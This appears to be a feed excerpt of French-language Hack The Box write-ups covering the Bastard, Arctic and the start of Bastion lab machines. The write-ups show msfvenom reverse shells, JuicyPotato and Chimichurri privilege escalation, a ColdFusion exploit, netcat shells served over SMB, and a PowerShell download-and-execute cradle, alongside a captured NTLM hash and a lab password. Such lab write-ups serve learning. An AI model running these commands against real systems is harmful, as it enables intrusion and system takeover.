class="cl">msfvenom -p windows/x64/powershell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.25 <span class="nv">LPORT</span><span class="o">=</span><span class="m">9999</span> -a x64 --platform windows -e x64/xor_dynamic -b <span class="s1">&#39;\x00&#39;</span> -f exe -o shell.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54&gt; .<span class="se">\s</span>hell.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">9999</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::9999 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:9999 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9:57676. </span></span><span class="line"><span class="cl">Windows PowerShell running as user BASTARD$ on BASTARD </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="seimpersonateprivilege---juicypotato">SEImpersonatePrivilege - JuicyPotato </h3><p>On exploit avec JuicyPotato (j&rsquo;ai vraiment beaucoup galérer&hellip;). On génére un deuxieme rev shell en .exe sur un autre port :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msfvenom -p windows/x64/powershell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.25 <span class="nv">LPORT</span><span class="o">=</span><span class="m">8888</span> -a x64 --platform windows -e x64/xor_dynamic -b <span class="s1">&#39;\x00&#39;</span> -f exe -o shell2.exe </span></span></code></pre></td></tr></table> </div> </div><p>On copie shell2.exe sur la machine puis on execute JuicyPotato.exe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54&gt; ./JP.exe -p cmd.exe -a <span class="s1">&#39;/c C:\inetpub\drupal-7.54\shell2.exe&#39;</span> -l <span class="m">4444</span> -t * -c <span class="s1">&#39;{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}&#39;</span> </span></span><span class="line"><span class="cl">Testing <span class="o">{</span>9B1F122C-2982-4e91-AA8B-E071D54F2A4D<span class="o">}</span> <span class="m">4444</span> </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> authresult <span class="m">0</span> </span></span><span class="line"><span class="cl"><span class="o">{</span>9B1F122C-2982-4e91-AA8B-E071D54F2A4D<span class="o">}</span><span class="p">;</span>NT AUTHORITY<span class="se">\S</span>YSTEM </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> CreateProcessWithTokenW OK </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">exegol-pentest /workspace $ nc -lnvp <span class="m">8888</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::8888 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:8888 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9:57681. </span></span><span class="line"><span class="cl">Windows PowerShell running as user BASTARD$ on BASTARD </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt </span></span><span class="line"><span class="cl">47f4.....3c54 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>un reverse shell en utilisant msfvenom semble plus stable (affiche les erreurs aussi) que le powershell -e &hellip;. que j&rsquo;ai utilisé. Peut etre a utilisé en priorité la prochaine fois ?</li> <li>Attention au CLSID. Toujours tester plusieurs. NE JAMAIS FAIRE CONFIANCE A CELUI PAR DEFAUT. Regarder sur : <ul> <li><a class="link" href="https://ohpe.it/juicy-potato/CLSID/" target="_blank" rel="noopener" >https://ohpe.it/juicy-potato/CLSID/</a></li> <li><a class="link" href="https://github.com/ohpe/juicy-potato/tree/master/CLSID/" target="_blank" rel="noopener" >https://github.com/ohpe/juicy-potato/tree/master/CLSID/</a></li> </ul> </li> </ul>https://leopoldabgn.github.io/writeups/p/arctic-htb/Sat, 08 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/arctic-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Arctic cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Arctic</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.11</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="system-infos">System Infos </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Host Name: ARCTIC </span></span><span class="line"><span class="cl">OS Name: Microsoft Windows Server <span class="m">2008</span> R2 Standard </span></span><span class="line"><span class="cl">OS Version: 6.1.7600 N/A Build <span class="m">7600</span> </span></span><span class="line"><span class="cl">OS Manufacturer: Microsoft Corporation </span></span><span class="line"><span class="cl">OS Configuration: Standalone Server </span></span><span class="line"><span class="cl">OS Build Type: Multiprocessor Free </span></span><span class="line"><span class="cl">Registered Owner: Windows User </span></span><span class="line"><span class="cl">Registered Organization: </span></span><span class="line"><span class="cl">Product ID: 55041-507-9857321-84451 </span></span><span class="line"><span class="cl">Original Install Date: 22/3/2017, 11:09:45 ?? </span></span><span class="line"><span class="cl">System Boot Time: 9/3/2025, 4:20:09 ?? </span></span><span class="line"><span class="cl">System Manufacturer: VMware, Inc. </span></span><span class="line"><span class="cl">System Model: VMware Virtual Platform </span></span><span class="line"><span class="cl">System Type: x64-based PC </span></span><span class="line"><span class="cl">Processor<span class="o">(</span>s<span class="o">)</span>: <span class="m">1</span> Processor<span class="o">(</span>s<span class="o">)</span> Installed. </span></span><span class="line"><span class="cl"> <span class="o">[</span>01<span class="o">]</span>: AMD64 Family <span class="m">25</span> Model <span class="m">1</span> Stepping <span class="m">1</span> AuthenticAMD ~2595 Mhz </span></span><span class="line"><span class="cl">BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020 </span></span><span class="line"><span class="cl">Windows Directory: C:<span class="se">\W</span>indows </span></span><span class="line"><span class="cl">System Directory: C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32 </span></span><span class="line"><span class="cl">Boot Device: <span class="se">\D</span>evice<span class="se">\H</span>arddiskVolume1 </span></span><span class="line"><span class="cl">System Locale: el<span class="p">;</span>Greek </span></span><span class="line"><span class="cl">Input Locale: en-us<span class="p">;</span>English <span class="o">(</span>United States<span class="o">)</span> </span></span><span class="line"><span class="cl">Time Zone: <span class="o">(</span>UTC+02:00<span class="o">)</span> Athens, Bucharest, Istanbul </span></span><span class="line"><span class="cl">Total Physical Memory: 6.143 MB </span></span><span class="line"><span class="cl">Available Physical Memory: 4.964 MB </span></span><span class="line"><span class="cl">Virtual Memory: Max Size: 12.285 MB </span></span><span class="line"><span class="cl">Virtual Memory: Available: 11.080 MB </span></span><span class="line"><span class="cl">Virtual Memory: In Use: 1.205 MB </span></span><span class="line"><span class="cl">Page File Location<span class="o">(</span>s<span class="o">)</span>: C:<span class="se">\p</span>agefile.sys </span></span><span class="line"><span class="cl">Domain: HTB </span></span><span class="line"><span class="cl">Logon Server: N/A </span></span><span class="line"><span class="cl">Hotfix<span class="o">(</span>s<span class="o">)</span>: N/A </span></span><span class="line"><span class="cl">Network Card<span class="o">(</span>s<span class="o">)</span>: <span class="m">1</span> NIC<span class="o">(</span>s<span class="o">)</span> Installed. </span></span><span class="line"><span class="cl"> <span class="o">[</span>01<span class="o">]</span>: Intel<span class="o">(</span>R<span class="o">)</span> PRO/1000 MT Network Connection </span></span><span class="line"><span class="cl"> Connection Name: Local Area Connection </span></span><span class="line"><span class="cl"> DHCP Enabled: No </span></span><span class="line"><span class="cl"> IP address<span class="o">(</span>es<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="o">[</span>01<span class="o">]</span>: 10.10.10.11 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -p- 10.10.10.11 </span></span><span class="line"><span class="cl">HTTP -&gt; Port <span class="m">8500</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="adobe-coldfusion-8">Adobe Coldfusion 8 </h3><p>On accède à une page de connexion pour les administrateurs du serveur : http://10.10.10.11:8500/CFIDE/administrator/enter.cfm</p> <p>On note qu&rsquo;il s&rsquo;agit du service Adobe Coldfusion 8. On trouve directement un poc en python sur searchsploit et on obtient un shell sur la machine :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ python3 exploit.py </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Printing some information <span class="k">for</span> debugging... </span></span><span class="line"><span class="cl">lhost: 10.10.14.10 </span></span><span class="line"><span class="cl">lport: <span class="m">1337</span> </span></span><span class="line"><span class="cl">rhost: 10.10.10.11 </span></span><span class="line"><span class="cl">rport: <span class="m">8500</span> </span></span><span class="line"><span class="cl">payload: 097d871e33a84bc8a3ed6002724b19ee.jsp </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Deleting the payload... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Listening <span class="k">for</span> connection... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Executing the payload... </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.10<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.11<span class="o">]</span> <span class="m">49235</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 6.1.7600<span class="o">]</span> </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">2009</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\C</span>oldFusion8<span class="se">\r</span>untime<span class="se">\b</span>in&gt; whoami </span></span><span class="line"><span class="cl">arctic<span class="se">\t</span>olis </span></span></code></pre></td></tr></table> </div> </div><h3 id="stabilize-powershell">Stabilize powershell </h3><p>Dans un premier temps, il a fallu obtenir un meilleur cmd.exe car il n&rsquo;était pas stable du tout. Impossible d&rsquo;obtenir directement un powershell (stable ou non). Ensuite, avec ce nouveau cmd.exe stable (grace a un serveur smbshare et un nc.exe), j&rsquo;ai pu utiliser un nouveau revershell pour obtenir un powershell stable a l&rsquo;aide du repo de nishang et de Invoke-TcpXXX.ps1.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Arctic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ impacket-smbserver share . </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Config file parsed </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Callback added <span class="k">for</span> UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Callback added <span class="k">for</span> UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Config file parsed </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Config file parsed </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Incoming connection <span class="o">(</span>10.10.10.11,49414<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> AUTHENTICATE_MESSAGE <span class="o">(</span>ARCTIC<span class="se">\t</span>olis,ARCTIC<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> User ARCTIC<span class="se">\t</span>olis authenticated successfully </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> tolis::ARCTIC:aaaaaaaaaaaaaaaa:c542f5a7a35d08fb97440dcae060b508:01010000000000000079e8fa958fdb0199d3a7cce7b544db00000000010010004a00550051007500770064006b004300030010004a00550051007500770064006b00430002001000500073005400480047006e005800440004001000500073005400480047006e0058004400070008000079e8fa958fdb01060004000200000008003000300000000000000000000000003000006d512dfe482ef201bb28a406e85c0fc4005f2cfd87b665b2061df41978469e2b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003000000000000000000000000000 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Disconnecting Share<span class="o">(</span>1:IPC$<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Disconnecting Share<span class="o">(</span>2:SHARE<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------INITIAL FOOTHOLD CMD.EXE------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\C</span>oldFusion8<span class="se">\r</span>untime<span class="se">\b</span>in&gt;<span class="se">\\</span>10.10.14.10<span class="se">\s</span>hare<span class="se">\n</span>c.exe -e cmd.exe 10.10.14.10 <span class="m">4444</span> </span></span><span class="line"><span class="cl"><span class="se">\\</span>10.10.14.10<span class="se">\s</span>hare<span class="se">\n</span>c.exe -e cmd.exe 10.10.14.10 <span class="m">4444</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-----------NEW CMD.EXE ON PORT 4444----------------- </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Arctic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">4444</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">4444</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.10<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.11<span class="o">]</span> <span class="m">49435</span> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 6.1.7600<span class="o">]</span> </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">2009</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\C</span>oldFusion8<span class="se">\r</span>untime<span class="se">\b</span>in&gt;<span class="se">\\</span>10.10.14.10<span class="se">\s</span>hare<span class="se">\n</span>c.exe -e powershell.exe 10.10.14.10 <span class="m">5555</span> </span></span><span class="line"><span class="cl"><span class="se">\\</span>10.10.14.10<span class="se">\s</span>hare<span class="se">\n</span>c.exe -e powershell.exe 10.10.14.10 <span class="m">5555</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\C</span>oldFusion8<span class="se">\r</span>untime<span class="se">\b</span>in&gt;powershell.exe IEX<span class="o">(</span>New-Object Net.WebClient<span class="o">)</span>.downloadString<span class="o">(</span><span class="s1">&#39;http://10.10.14.10:8888/shell.ps1&#39;</span><span class="o">)</span> </span></span><span class="line"><span class="cl">powershell.exe IEX<span class="o">(</span>New-Object Net.WebClient<span class="o">)</span>.downloadString<span class="o">(</span><span class="s1">&#39;http://10.10.14.10:8888/shell.ps1&#39;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-----------POWERSHELL ON PORT 1338------------------ </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Arctic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1338</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1338</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.10<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.11<span class="o">]</span> <span class="m">49451</span> </span></span><span class="line"><span class="cl">Windows PowerShell running as user tolis on ARCTIC </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> <span class="m">2015</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\C</span>oldFusion8<span class="se">\r</span>untime<span class="se">\b</span>in&gt;whoami </span></span><span class="line"><span class="cl">arctic<span class="se">\t</span>olis </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="kernel-exploit--chimichurriexe">Kernel Exploit : Chimichurri.exe </h3><p>Searching for elevation privilege CVE using &ldquo;wes&rdquo; windows-exploits-suggester.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Arctic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ wes ./arctic_systeminfo <span class="p">|</span> grep -I <span class="s1">&#39;Elevation of Privilege&#39;</span> -B7 <span class="p">|</span> grep CVE-2010-2554 -A7 -B2 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Date: <span class="m">20100810</span> </span></span><span class="line"><span class="cl">CVE: CVE-2010-2554 </span></span><span class="line"><span class="cl">KB: KB982799 </span></span><span class="line"><span class="cl">Title: Vulnerabilities in the Tracing Feature <span class="k">for</span> Services Could Allow Elevation of Privilege </span></span><span class="line"><span class="cl">Affected product: Windows Server <span class="m">2008</span> R2 <span class="k">for</span> x64-based Systems </span></span><span class="line"><span class="cl">Affected component: </span></span><span class="line"><span class="cl">Severity: Important </span></span><span class="line"><span class="cl">Impact: Elevation of Privilege </span></span><span class="line"><span class="cl">-- </span></span></code></pre></td></tr></table> </div> </div><p>On trouve un github avec un exe deja compilé pour faire l&rsquo;exploit:</p> <blockquote> <p><a class="link" href="https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe" target="_blank" rel="noopener" >https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe</a></p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\t</span>olis&gt; .<span class="se">\C</span>himichurri.exe </span></span><span class="line"><span class="cl">/Chimichurri/--&gt;This exploit gives you a Local System shell &lt;BR&gt;/Chimichurri/--&gt;Usage: Chimichurri.exe ipaddress port &lt;BR&gt; </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\t</span>olis&gt; .<span class="se">\C</span>himichurri.exe 10.10.14.10 <span class="m">7676</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Arctic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">7676</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">7676</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.10<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.11<span class="o">]</span> <span class="m">50748</span> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 6.1.7600<span class="o">]</span> </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">2009</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\t</span>olis&gt;whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">nt authority<span class="se">\s</span>ystem </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\t</span>olis&gt;cd ../Administrator<span class="se">\D</span>esktop </span></span><span class="line"><span class="cl"><span class="nb">cd</span> ../Administrator<span class="se">\D</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt;type root.txt </span></span><span class="line"><span class="cl"><span class="nb">type</span> root.txt </span></span><span class="line"><span class="cl">8980.....ffb6 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/bastion-htb/Mon, 03 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/bastion-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Bastion cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Bastion</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.134</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">L4mpje : bureaulampje </span></span><span class="line"><span class="cl">Administrator : 